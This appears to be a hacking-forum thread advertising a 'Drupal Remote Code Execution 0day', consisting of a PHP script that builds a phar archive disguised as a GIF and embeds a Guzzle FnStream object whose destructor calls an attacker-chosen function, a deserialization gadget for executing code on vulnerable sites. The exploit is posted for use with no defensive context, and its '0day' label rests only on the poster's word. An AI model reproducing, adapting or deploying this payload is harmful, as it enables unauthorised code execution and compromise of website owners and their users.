Return to forum
Drupal Remote Code Execution 0day
by - Thursday, January 1, 1970 at 12:00 AM
Banned
Posts: 190
Threads: 0
Joined: N/A
Reputation: -1075

#1
August 11, 2022 at 2:47 AM

Durpal Remote Code Execution
<?php

namespace GuzzleHttp\Psr7 {
    class FnStream {

        public $_fn_close = "phpinfo";

        public function __destruct() {
            if (isset($this->_fn_close)) {
                call_user_func($this->_fn_close);
            }
        }
    }
}

namespace {
    @unlink("phar.phar");
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
    $o = new \GuzzleHttp\Psr7\FnStream();
    $phar->setMetadata($o);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();

}
?>
Twitter.com/ClumsyLulz
T.me/SleepTheGod
Github.com/SleepTheGod
Pastebin.com/u/Sleep
Reply


 Users viewing this thread: Drupal Remote Code Execution 0day: No users currently viewing.